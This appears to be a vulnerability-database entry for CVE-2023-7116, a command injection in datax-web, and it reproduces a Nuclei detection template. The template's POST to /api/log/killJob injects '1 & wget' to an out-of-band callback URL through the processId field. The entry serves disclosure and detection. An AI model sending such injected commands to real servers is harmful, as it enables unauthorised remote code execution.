CVE-2023-7116: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection

日期: 2025-08-01 | 影响软件: WeiYe Jing datax web | POC: 已公开

漏洞描述

A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.

PoC代码[已公开]

id: CVE-2023-7116

info:
  name: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
  author: pussycat0x
  severity: medium
  description: |
    A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.249086
    - https://vuldb.com/?id.249086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2023-7116
    cwe-id: CWE-78
    epss-score: 0.53813
    epss-percentile: 0.97877
    cpe: cpe:2.3:a:datax-web_project:datax-web:2.1.2:*:*:*:*:*:*:*
  metadata:
    vendor: datax-web_project
    product: datax-web
  tags: cve,cve2023,datax-web,oast,rce,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "<title>Datax Web"
        internal: true

  - raw:
      - |
        POST /api/log/killJob HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"processId":"1 & wget http://{{interactsh-url}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100985b9c9be3bf414d31b1b527de93689ae2d3a6997a3b01a19926b8bba2b823e0022004f51afe432533c7638602b2cf530b3f282ffb8e6b1009a4332bb0cf3133aa41:922c64590222798bb761d5b6d8e72950

相关漏洞推荐